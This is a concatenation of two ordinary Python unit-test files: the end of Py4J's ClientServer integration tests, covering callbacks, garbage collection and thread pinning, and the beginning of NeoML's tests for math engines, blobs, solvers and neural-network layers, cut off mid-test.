opExample = client_server.jvm.py4j.examples.OperatorExample()
opExample.launchOperator(operator, 500)
sleep(0.1)
str_connection = str(
list(client_server._callback_server.connections)[0])
sleep(0.75)
str_connection2 = str(
list(client_server._callback_server.connections)[0])
self.assertNotEqual(str_connection, str_connection2)
except Py4JJavaError:
self.fail("Callbackserver did not retry.")
finally:
client_server.shutdown()
class IntegrationTest(unittest.TestCase):
def testJavaClientPythonServer(self):
hello_state = HelloState()
client_server = ClientServer(
JavaParameters(), PythonParameters(), hello_state)
with clientserver_example_app_process(True):
client_server.shutdown()
# Check that Java correctly called Python
self.assertEqual(2, len(hello_state.calls))
self.assertEqual((None, None), hello_state.calls[0])
self.assertEqual((2, "Hello World"), hello_state.calls[1])
def testBasicJVM(self):
with clientserver_example_app_process():
client_server = ClientServer(
JavaParameters(), PythonParameters())
ms = client_server.jvm.System.currentTimeMillis()
self.assertTrue(ms > 0)
client_server.shutdown()
def testErrorInPy4J(self):
with clientserver_example_app_process():
client_server = ClientServer(
JavaParameters(), PythonParameters())
try:
client_server.jvm.java.lang.Math.abs(
3000000000000000000000000000000000000)
self.fail("Should not be able to convert overflowing long")
except Py4JError:
self.assertTrue(True)
# Check that the connection is not broken (refs #265)
val = client_server.jvm.java.lang.Math.abs(-4)
self.assertEqual(4, val)
client_server.shutdown()
def testStream(self):
with clientserver_example_app_process():
client_server = ClientServer(
JavaParameters(), PythonParameters())
e = client_server.entry_point.getNewExample()
# not binary - just get the Java object
v1 = e.getStream()
self.assertTrue(
is_instance_of(
client_server, v1,
"java.nio.channels.ReadableByteChannel"))
# pull it as a binary stream
with e.getStream.stream() as conn:
self.assertTrue(isinstance(conn, GatewayConnectionGuard))
expected =\
u"Lorem ipsum dolor sit amet, consectetur adipiscing elit."
self.assertEqual(
expected, smart_decode(conn.read(len(expected))))
client_server.shutdown()
def testRecursionWithAutoGC(self):
with clientserver_example_app_process():
client_server = ClientServer(
JavaParameters(auto_gc=True), PythonParameters(auto_gc=True))
pingpong = client_server.jvm.py4j.examples.PingPong()
ping = PythonPing()
self.assertEqual(2, pingpong.start(ping))
pingpong = client_server.jvm.py4j.examples.PingPong(True)
try:
pingpong.start(ping)
self.fail()
except Py4JJavaError:
# TODO Make sure error are recursively propagated
# Also a problem with old threading model.
self.assertTrue(True)
ping = PythonPing(True)
pingpong = client_server.jvm.py4j.examples.PingPong(False)
try:
pingpong.start(ping)
self.fail()
except Py4JJavaError:
# TODO Make sure error are recursively propagated
# Also a problem with old threading model.
self.assertTrue(True)
client_server.shutdown()
def testJavaGC(self):
# This will only work with some JVM.
with clientserver_example_app_process():
client_server = ClientServer(
JavaParameters(), PythonParameters())
example = client_server.entry_point.getNewExample()
impl = IHelloImpl()
self.assertEqual("This is Hello!", example.callHello(impl))
self.assertEqual(
"This is Hello;\n10MyMy!\n;",
example.callHello2(impl))
self.assertEqual(2, len(client_server.gateway_property.pool))
# Make sure that finalizers do not block by calling the Java
# finalizer again
impl2 = IHelloImpl()
self.assertEqual("This is Hello!", example.callHello(impl2))
self.assertEqual(3, len(client_server.gateway_property.pool))
# The two PythonProxies should be evicted on the Java side
# Java should tell python to release the references.
client_server.jvm.java.lang.System.gc()
# Leave time for sotimeout
sleep(3)
self.assertTrue(len(client_server.gateway_property.pool) < 2)
client_server.shutdown()
def testPythonGC(self):
def internal_function(client_server):
example = client_server.entry_point.getNewExample()
in_middle = len(
client_server.java_gateway_server.getGateway().getBindings())
self.assertEqual(1, example.method1())
# After this method is executed, Python no longer need
# a reference to example and it should tell Java to release
# the reference too
return in_middle
with clientserver_example_app_process():
# This will only work with some JVM.
client_server = ClientServer(
JavaParameters(), PythonParameters())
before = len(
client_server.java_gateway_server.getGateway().getBindings())
in_middle = internal_function(client_server)
# Force Python to run garbage collection in case it did
# not run yet.
sleep()
gc.collect()
sleep()
after = len(
client_server.java_gateway_server.getGateway().getBindings())
# Number of references on the Java side should be the same before
# and after
self.assertEqual(before, after)
# Number of references when we created a JavaObject should be
# higher than at the beginning.
self.assertTrue(in_middle > before)
client_server.shutdown()
def testMultiClientServerWithSharedJavaThread(self):
with java_multi_client_server_app_process():
client_server0 = ClientServer(
JavaParameters(), PythonParameters())
client_server1 = ClientServer(
JavaParameters(port=DEFAULT_PORT + 2),
PythonParameters(port=DEFAULT_PYTHON_PROXY_PORT + 2))
entry0 = client_server0.entry_point
entry1 = client_server1.entry_point
# set up the ability for Java to get the Python thread ids
threadIdGetter0 = PythonGetThreadId(client_server0)
threadIdGetter1 = PythonGetThreadId(client_server1)
entry0.setPythonThreadIdGetter(threadIdGetter0)
entry1.setPythonThreadIdGetter(threadIdGetter1)
thisThreadId = threading.current_thread().ident
# ## Preconditions
# Make sure we are talking to two different Entry points on
# Java side
self.assertEqual(0, entry0.getEntryId())
self.assertEqual(1, entry1.getEntryId())
# ## 1 Hop to Shared Java Thread
# Check that the shared Java thread is the same thread
# for both ClientServers
sharedJavaThreadId = entry0.getSharedJavaThreadId()
self.assertEqual(sharedJavaThreadId,
entry1.getSharedJavaThreadId())
# And that it is distinct from either corresponding to
# this Python thread
self.assertNotEqual(sharedJavaThreadId, entry0.getJavaThreadId())
self.assertNotEqual(sharedJavaThreadId, entry1.getJavaThreadId())
# ## 2 Hops via Shared Java Thread to Python Thread
# Check that the shared thread ends up as different threads
# in the Python side. This part may not be obvious as the
# top-level idea seems to be for Python thread to be pinned
# to Java thread. Consider that this case is a simplification
# of the real case. In the real case there are two
# ClientServers running in same JVM, but in Python side each
# ClientServer is in its own process. In that case it makes
# it obvious that the shared Java thread should indeed
# end up in different Python threads.
sharedPythonThreadId0 = entry0.getSharedPythonThreadId()
sharedPythonThreadId1 = entry1.getSharedPythonThreadId()
# three way assert to make sure all three python
# threads are distinct
self.assertNotEqual(thisThreadId, sharedPythonThreadId0)
self.assertNotEqual(thisThreadId, sharedPythonThreadId1)
self.assertNotEqual(sharedPythonThreadId0, sharedPythonThreadId1)
# Check that the Python thread id does not change between
# invocations
self.assertEquals(sharedPythonThreadId0,
entry0.getSharedPythonThreadId())
self.assertEquals(sharedPythonThreadId1,
entry1.getSharedPythonThreadId())
# ## 3 Hops to Shared Java Thread
# Check that the thread above after 2 hops calls back
# into the Java shared thread
self.assertEqual(sharedJavaThreadId,
entry0.getSharedViaPythonJavaThreadId())
self.assertEqual(sharedJavaThreadId,
entry1.getSharedViaPythonJavaThreadId())
client_server0.shutdown()
client_server1.shutdown()
def testMultiClientServer(self):
with java_multi_client_server_app_process():
client_server0 = ClientServer(
JavaParameters(), PythonParameters())
client_server1 = ClientServer(
JavaParameters(port=DEFAULT_PORT + 2),
PythonParameters(port=DEFAULT_PYTHON_PROXY_PORT + 2))
entry0 = client_server0.entry_point
entry1 = client_server1.entry_point
# set up the ability for Java to get the Python thread ids
threadIdGetter0 = PythonGetThreadId(client_server0)
threadIdGetter1 = PythonGetThreadId(client_server1)
entry0.setPythonThreadIdGetter(threadIdGetter0)
entry1.setPythonThreadIdGetter(threadIdGetter1)
thisThreadId = threading.current_thread().ident
# Make sure we are talking to two different Entry points on
# Java side
self.assertEqual(0, entry0.getEntryId())
self.assertEqual(1, entry1.getEntryId())
# ## 0 Hops to Thread ID
# Check that the two thread getters get the same thread
self.assertEquals(thisThreadId,
int(threadIdGetter0.getThreadId()))
self.assertEquals(thisThreadId,
int(threadIdGetter1.getThreadId()))
# ## 1 Hop to Thread ID
# Check that ClientServers on Java side are on different threads
javaThreadId0 = entry0.getJavaThreadId()
javaThreadId1 = entry1.getJavaThreadId()
self.assertNotEqual(javaThreadId0, javaThreadId1)
# Check that ClientServers on Java side stay on same thread
# on subsequent calls to them
self.assertEqual(javaThreadId0, entry0.getJavaThreadId())
self.assertEqual(javaThreadId1, entry1.getJavaThreadId())
# Check alternate way of getting thread ids and that they match
self.assertEqual(javaThreadId0,
int(threadIdGetter0.getJavaThreadId()))
self.assertEqual(javaThreadId1,
int(threadIdGetter1.getJavaThreadId()))
# ## 2 Hops to Thread ID
# Check that round trips from Python to Java and Python
# end up back on this thread, regardless of which
# client server we use for the round trip
self.assertEqual(thisThreadId,
entry0.getPythonThreadId())
self.assertEqual(thisThreadId,
entry1.getPythonThreadId())
# ## 3 Hops to Thread ID
# Check that round trips from Python to Java to Python to Java
# end up on the same thread as 1 hop
self.assertEqual(javaThreadId0,
entry0.getViaPythonJavaThreadId())
self.assertEqual(javaThreadId1,
entry1.getViaPythonJavaThreadId())
client_server0.shutdown()
client_server1.shutdown()
class PythonGetThreadId(object):
def __init__(self, gateway):
self.gateway = gateway
def getThreadId(self):
# Return as a string because python3 doesn't have a long type anymore
# and as a result when using python3 and the value is 32-bits this
# arrives at Java as an Integer which fails to be converted to a Long
return str(threading.current_thread().ident)
def getJavaThreadId(self):
# see comment above for why a string.
return str(self.gateway.jvm.java.lang.Thread.currentThread().getId())
class Java:
implements = ["py4j.examples.MultiClientServerGetThreadId"]
|
tests.py | from unittest import TestCase
import os
import tempfile
import pickle
import itertools
import numpy as np
from scipy import sparse
import neoml
import threading
class MultithreadedTestCase(TestCase):
def _thread_function(self, target, kwargs):
print(f"python thread {threading.get_ident()} started")
target(**kwargs)
print(f"python thread {threading.get_ident()} finished")
def _test_mt(self, target, result, enable_assert=False):
import time
threads = []
system_time, user_time = time.perf_counter(), time.process_time()
for _ in range(4):
t = threading.Thread(target=self._thread_function, args=(target, {'result': result}))
threads.append(t)
t.start()
for t in threads:
t.join()
system_time, user_time = time.perf_counter() - system_time, time.process_time() - user_time
print()
print('System time {0:.6f} sec.'.format(system_time))
print('User time {0:.6f} sec.'.format(user_time))
if enable_assert:
self.assertTrue(system_time < user_time)
def run(self, result=None):
self._test_mt(super().run, result=result)
class MathEngineTestCase(MultithreadedTestCase):
def test_gpu_math_engine(self):
check = False
try:
print(neoml.MathEngine.GpuMathEngine(666).info)
except ValueError as err:
check = True
self.assertEqual(check, True)
check = False
try:
print(neoml.MathEngine.GpuMathEngine(-666).info)
except ValueError as err:
check = True
self.assertEqual(check, True)
gpu = neoml.MathEngine.enum_gpu()
index = 0
for x in gpu:
math_engine = neoml.MathEngine.GpuMathEngine(index)
self.assertTrue(isinstance(math_engine, neoml.MathEngine.GpuMathEngine))
index += 1
def test_cpu_math_engine(self):
math_engine = neoml.MathEngine.CpuMathEngine()
self.assertTrue(isinstance(math_engine, neoml.MathEngine.CpuMathEngine))
blob = neoml.Blob.vector(math_engine, 10, "int32")
self.assertEqual(math_engine.peak_memory_usage, 40)
class BlobTestCase(MultithreadedTestCase):
def test_pickle(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
a = np.ones((2, 3, 4, 5), dtype=np.int32)
shape = (2, 3, 1, 4, 1, 1, 5)
blob = neoml.Blob.asblob(math_engine, a, shape, False)
dir = tempfile.mkdtemp()
path = os.path.join(dir, 'blob.pickle')
binary_file = open(path, mode='wb')
pickle.dump(blob, binary_file)
binary_file.close()
binary_file = open(path, mode='rb')
loaded_blob = pickle.load(binary_file)
binary_file.close()
os.remove(path)
os.rmdir(dir)
self.assertEqual(blob.shape, loaded_blob.shape)
def test_load_store(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
a = np.ones((2, 3, 4, 5), dtype=np.int32)
shape = (2, 3, 1, 4, 1, 1, 5)
blob = neoml.Blob.asblob(math_engine, a, shape, False)
dir = tempfile.mkdtemp()
path = os.path.join(dir, 'blob.pickle')
neoml.Blob.store(blob, path)
loaded_blob = neoml.Blob.load(math_engine, path)
os.remove(path)
os.rmdir(dir)
self.assertEqual(blob.shape, loaded_blob.shape)
def test_copy(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
a = np.ones((4, 4, 4, 4), dtype=np.int32)
shape = (4, 4, 1, 4, 4, 1, 1)
blob = neoml.Blob.asblob(math_engine, a, shape, False)
blob2 = blob.copy(math_engine)
self.assertEqual(blob2.shape, blob.shape)
a2 = blob2.asarray()
self.assertEqual(a2.shape, a.shape)
def test_asblob(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
float_array = np.ones((2, 5, 7, 16), dtype=np.float32)
shape = (1, 2, 1, 5, 7, 1, 16)
float_blob = neoml.Blob.asblob(math_engine, float_array, shape, False)
self.assertEqual(float_blob.shape, shape)
self.assertEqual(float_blob.batch_len, 1)
self.assertEqual(float_blob.batch_width, 2)
self.assertEqual(float_blob.list_size, 1)
self.assertEqual(float_blob.height, 5)
self.assertEqual(float_blob.width, 7)
self.assertEqual(float_blob.depth, 1)
self.assertEqual(float_blob.channels, 16)
self.assertEqual(float_blob.size, 2 * 5 * 7 * 16)
self.assertEqual(float_blob.object_count, 2)
self.assertEqual(float_blob.object_size, 5 * 7 * 16)
blob_float_array = float_blob.asarray()
blob_float_array2 = float_blob.asarray(True)
self.assertEqual(blob_float_array.shape, blob_float_array2.shape)
float_array[0][1][1][1] = 2.0
self.assertEqual(float_array[0][1][1][1], blob_float_array[0][1][1][1])
self.assertEqual(1.0, blob_float_array2[0][1][1][1])
def test_vector(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
float_blob = neoml.Blob.vector(math_engine, 16, "float32")
self.assertEqual(float_blob.batch_len, 16)
self.assertEqual(float_blob.batch_width, 1)
self.assertEqual(float_blob.list_size, 1)
self.assertEqual(float_blob.height, 1)
self.assertEqual(float_blob.width, 1)
self.assertEqual(float_blob.depth, 1)
self.assertEqual(float_blob.channels, 1)
self.assertEqual(float_blob.size, 16)
self.assertEqual(float_blob.object_count, 16)
self.assertEqual(float_blob.object_size, 1)
def test_matrix(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
float_blob = neoml.Blob.matrix(math_engine, 16, 32, "int32")
self.assertEqual(float_blob.batch_len, 16)
self.assertEqual(float_blob.batch_width, 32)
self.assertEqual(float_blob.list_size, 1)
self.assertEqual(float_blob.height, 1)
self.assertEqual(float_blob.width, 1)
self.assertEqual(float_blob.depth, 1)
self.assertEqual(float_blob.channels, 1)
self.assertEqual(float_blob.size, 16 * 32)
self.assertEqual(float_blob.object_count, 16 * 32)
self.assertEqual(float_blob.object_size, 1)
def test_tensor(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
shape = (1, 2, 3, 4, 5, 6, 7)
float_blob = neoml.Blob.tensor(math_engine, shape, "int32")
self.assertEqual(float_blob.batch_len, 1)
self.assertEqual(float_blob.batch_width, 2)
self.assertEqual(float_blob.list_size, 3)
self.assertEqual(float_blob.height, 4)
self.assertEqual(float_blob.width, 5)
self.assertEqual(float_blob.depth, 6)
self.assertEqual(float_blob.channels, 7)
self.assertEqual(float_blob.size, 1 * 2 * 3 * 4 * 5 * 6 * 7)
self.assertEqual(float_blob.object_count, 2 * 3)
self.assertEqual(float_blob.object_size, 4 * 5 * 6 * 7)
def test_list_blob(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
float_blob = neoml.Blob.list_blob(math_engine, 2, 3, 4, 5, "int32")
self.assertEqual(float_blob.batch_len, 2)
self.assertEqual(float_blob.batch_width, 3)
self.assertEqual(float_blob.list_size, 4)
self.assertEqual(float_blob.height, 1)
self.assertEqual(float_blob.width, 1)
self.assertEqual(float_blob.depth, 1)
self.assertEqual(float_blob.channels, 5)
self.assertEqual(float_blob.size, 2 * 3 * 4 * 5)
self.assertEqual(float_blob.object_count, 2 * 3 * 4)
self.assertEqual(float_blob.object_size, 5)
def test_image2d(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
float_blob = neoml.Blob.image2d(math_engine, 2, 3, 4, 5, 6, "float32")
self.assertEqual(float_blob.batch_len, 2)
self.assertEqual(float_blob.batch_width, 3)
self.assertEqual(float_blob.list_size, 1)
self.assertEqual(float_blob.height, 4)
self.assertEqual(float_blob.width, 5)
self.assertEqual(float_blob.depth, 1)
self.assertEqual(float_blob.channels, 6)
self.assertEqual(float_blob.size, 2 * 3 * 4 * 5 * 6)
self.assertEqual(float_blob.object_count, 2 * 3)
self.assertEqual(float_blob.object_size, 4 * 5 * 6)
def test_image3d(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
float_blob = neoml.Blob.image3d(math_engine, 2, 3, 4, 5, 6, 7, "float32")
self.assertEqual(float_blob.batch_len, 2)
self.assertEqual(float_blob.batch_width, 3)
self.assertEqual(float_blob.list_size, 1)
self.assertEqual(float_blob.height, 4)
self.assertEqual(float_blob.width, 5)
self.assertEqual(float_blob.depth, 6)
self.assertEqual(float_blob.channels, 7)
self.assertEqual(float_blob.size, 2 * 3 * 4 * 5 * 6 * 7)
self.assertEqual(float_blob.object_count, 2 * 3)
self.assertEqual(float_blob.object_size, 4 * 5 * 6 * 7)
class SolverTestCase(MultithreadedTestCase):
def test_nesterov_gradient(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
solver = neoml.Dnn.NesterovGradient(math_engine, learning_rate=0.6, l1=0.6, l2=0.6,
moment_decay_rate=0.6, max_gradient_norm=0.6,
second_moment_decay_rate=0.6, epsilon=0.6, ams_grad=True)
self.assertAlmostEqual(solver.l1, 0.6, delta=1e-3)
self.assertAlmostEqual(solver.l2, 0.6, delta=1e-3)
self.assertAlmostEqual(solver.learning_rate, 0.6, delta=1e-3)
self.assertAlmostEqual(solver.max_gradient_norm, 0.6, delta=1e-3)
self.assertAlmostEqual(solver.moment_decay_rate, 0.6, delta=1e-3)
self.assertAlmostEqual(solver.second_moment_decay_rate, 0.6, delta=1e-3)
self.assertAlmostEqual(solver.epsilon, 0.6, delta=1e-3)
self.assertEqual(solver.ams_grad, True)
def test_adaptive_gradient(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
solver = neoml.Dnn.AdaptiveGradient(math_engine, learning_rate=0.6, l1=0.6, l2=0.6,
moment_decay_rate=0.6, max_gradient_norm=0.6,
second_moment_decay_rate=0.6, epsilon=0.6, ams_grad=True)
self.assertAlmostEqual(solver.l1, 0.6, delta=1e-3)
self.assertAlmostEqual(solver.l2, 0.6, delta=1e-3)
self.assertAlmostEqual(solver.learning_rate, 0.6, delta=1e-3)
self.assertAlmostEqual(solver.max_gradient_norm, 0.6, delta=1e-3)
self.assertAlmostEqual(solver.moment_decay_rate, 0.6, delta=1e-3)
self.assertAlmostEqual(solver.second_moment_decay_rate, 0.6, delta=1e-3)
self.assertAlmostEqual(solver.epsilon, 0.6, delta=1e-3)
self.assertEqual(solver.ams_grad, True)
def test_simple_gradient(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
solver = neoml.Dnn.SimpleGradient(math_engine, learning_rate=0.6, l1=0.6, l2=0.6,
moment_decay_rate=0.6, max_gradient_norm=0.6)
self.assertAlmostEqual(solver.l1, 0.6, delta=1e-3)
self.assertAlmostEqual(solver.l2, 0.6, delta=1e-3)
self.assertAlmostEqual(solver.learning_rate, 0.6, delta=1e-3)
self.assertAlmostEqual(solver.max_gradient_norm, 0.6, delta=1e-3)
self.assertAlmostEqual(solver.moment_decay_rate, 0.6, delta=1e-3)
class LayersTestCase(MultithreadedTestCase):
def test_lstm(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
lstm = neoml.Dnn.Lstm(source1, 7, 0.6, name="lstm")
sink1 = neoml.Dnn.Sink((lstm, 0), "sink1")
sink2 = neoml.Dnn.Sink((lstm, 1), "sink2")
layer = dnn.layers['lstm']
self.assertEqual(layer.name, 'lstm')
input1 = neoml.Blob.asblob(math_engine, np.ones((5, 3, 16), dtype=np.float32), (5, 3, 1, 1, 1, 1, 16))
inputs = {"source1": input1}
outputs = dnn.run(inputs)
out1 = outputs["sink1"].asarray()
out2 = outputs["sink2"].asarray()
self.assertEqual(lstm.hidden_size, 7)
self.assertEqual(layer.hidden_size, 7)
self.assertEqual(lstm.reverse_sequence, False)
lstm.reverse_sequence = True
self.assertEqual(lstm.reverse_sequence, True)
self.assertEqual(layer.reverse_sequence, True)
self.assertAlmostEqual(lstm.dropout, 0.6, delta=1e-3)
lstm.dropout = 0.9
self.assertAlmostEqual(lstm.dropout, 0.9, delta=1e-3)
self.assertAlmostEqual(layer.dropout, 0.9, delta=1e-3)
self.assertEqual(lstm.activation, "sigmoid")
lstm.activation = "abs"
self.assertEqual(lstm.activation, "abs")
self.assertEqual(out1.shape, (5, 3, 7))
self.assertEqual(out2.shape, (5, 3, 7))
w_blob = lstm.input_weights
weights = w_blob.asarray()
lstm.input_weights = w_blob
f_blob = lstm.input_free_term
free_term = f_blob.asarray()
lstm.input_free_term = f_blob
w_blob = lstm.recurrent_weights
weights = w_blob.asarray()
lstm.recurrent_weights = w_blob
f_blob = lstm.recurrent_free_term
free_term = f_blob.asarray()
lstm.recurrent_free_term = f_blob
self.assertEqual(weights.shape, (28, 7))
self.assertEqual(free_term.shape, (28,))
def test_fully_connected(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
fully = neoml.Dnn.FullyConnected((source1, source2), 5, False, "fully")
sink1 = neoml.Dnn.Sink((fully, 0), "sink1")
sink2 = neoml.Dnn.Sink((fully, 1), "sink2")
layer = dnn.layers['fully']
self.assertEqual(layer.name, 'fully')
input1 = neoml.Blob.asblob(math_engine, np.ones((12, 16), dtype=np.float32), (12, 1, 1, 1, 1, 1, 16))
input2 = neoml.Blob.asblob(math_engine, np.ones((10, 16), dtype=np.float32), (10, 1, 1, 1, 1, 1, 16))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
out1 = outputs["sink1"].asarray()
out2 = outputs["sink2"].asarray()
self.assertEqual(fully.element_count, 5)
self.assertEqual(layer.element_count, 5)
self.assertEqual(fully.zero_free_term, False)
fully.zero_free_term = True
self.assertEqual(fully.zero_free_term, True)
self.assertEqual(layer.zero_free_term, True)
self.assertEqual(out1.shape, (12, 5))
self.assertEqual(out2.shape, (10, 5))
w_blob = fully.weights
weights = w_blob.asarray()
fully.weights = w_blob
f_blob = fully.free_term
free_term = f_blob.asarray()
fully.free_term = f_blob
self.assertEqual(weights.shape, (5, 16))
self.assertEqual(free_term.shape, (5,))
def test_concat_channels(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
concat = neoml.Dnn.ConcatChannels((source1, source2), "concat")
sink = neoml.Dnn.Sink(concat, "sink")
layer = dnn.layers['concat']
self.assertEqual(layer.name, 'concat')
input1 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 1, 1, 1, 1, 16))
input2 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 1, 1, 1, 1, 16))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"].asarray()
self.assertEqual(outputs["sink"].channels, 32)
self.assertEqual(a.size, 32)
def test_concat_depth(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
concat = neoml.Dnn.ConcatDepth((source1, source2), "concat")
sink = neoml.Dnn.Sink(concat, "sink")
layer = dnn.layers['concat']
self.assertEqual(layer.name, 'concat')
input1 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 1, 1, 1, 16, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 1, 1, 1, 16, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"].asarray()
self.assertEqual(outputs["sink"].depth, 32)
self.assertEqual(a.size, 32)
def test_concat_width(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
concat = neoml.Dnn.ConcatWidth((source1, source2), "concat")
sink = neoml.Dnn.Sink(concat, "sink")
layer = dnn.layers['concat']
self.assertEqual(layer.name, 'concat')
input1 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 1, 1, 16, 1, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 1, 1, 16, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"].asarray()
self.assertEqual(outputs["sink"].width, 32)
self.assertEqual(a.size, 32)
def test_concat_height(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
concat = neoml.Dnn.ConcatHeight((source1, source2), "concat")
sink = neoml.Dnn.Sink(concat, "sink")
layer = dnn.layers['concat']
self.assertEqual(layer.name, 'concat')
input1 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 1, 16, 1, 1, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 1, 16, 1, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"].asarray()
self.assertEqual(outputs["sink"].height, 32)
self.assertEqual(a.size, 32)
def test_concat_batch_width(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
concat = neoml.Dnn.ConcatBatchWidth((source1, source2), "concat")
sink = neoml.Dnn.Sink(concat, "sink")
layer = dnn.layers['concat']
self.assertEqual(layer.name, 'concat')
input1 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 16, 1, 1, 1, 1, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 16, 1, 1, 1, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"].asarray()
self.assertEqual(outputs["sink"].batch_width, 32)
self.assertEqual(a.size, 32)
def test_concat_batch_length(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
concat = neoml.Dnn.ConcatBatchLength((source1, source2), "concat")
sink = neoml.Dnn.Sink(concat, "sink")
layer = dnn.layers['concat']
self.assertEqual(layer.name, 'concat')
input1 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (16, 1, 1, 1, 1, 1, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((15), dtype=np.float32), (15, 1, 1, 1, 1, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"].asarray()
self.assertEqual(outputs["sink"].batch_len, 31)
self.assertEqual(a.size, 31)
def test_concat_list_size(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
concat = neoml.Dnn.ConcatListSize((source1, source2), "concat")
sink = neoml.Dnn.Sink(concat, "sink")
layer = dnn.layers['concat']
self.assertEqual(layer.name, 'concat')
input1 = neoml.Blob.asblob(math_engine, np.ones((15), dtype=np.float32), (1, 1, 15, 1, 1, 1, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 16, 1, 1, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"].asarray()
self.assertEqual(outputs["sink"].list_size, 31)
self.assertEqual(a.size, 31)
def test_concat_object(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
concat = neoml.Dnn.ConcatObject((source1, source2), "concat")
sink = neoml.Dnn.Sink(concat, "sink")
layer = dnn.layers['concat']
self.assertEqual(layer.name, 'concat')
input1 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4, 5), dtype=np.float32), (1, 1, 1, 2, 3, 4, 5))
input2 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 1, 16, 1, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"].asarray()
self.assertEqual(outputs["sink"].channels, 136)
self.assertEqual(a.size, 136)
def test_enum_binarization(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
bin = neoml.Dnn.EnumBinarization(source1, 5, "bin")
sink = neoml.Dnn.Sink(bin, "sink")
layer = dnn.layers['bin']
self.assertEqual(layer.name, 'bin')
self.assertEqual(bin.enum_size, 5)
bin.enum_size = 4
self.assertEqual(bin.enum_size, 4)
self.assertEqual(layer.enum_size, 4)
input1 = neoml.Blob.asblob(math_engine, np.ones((4, 3, 3, 3), dtype=np.float32), (4, 1, 1, 3, 3, 3, 1))
inputs = {"source1": input1}
outputs = dnn.run(inputs)
a = outputs["sink"]
self.assertEqual(a.shape, (4, 1, 1, 3, 3, 3, 4))
def test_bitset_vectorization(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
bin = neoml.Dnn.BitSetVectorization(source1, 5, "bin")
sink = neoml.Dnn.Sink(bin, "sink")
layer = dnn.layers['bin']
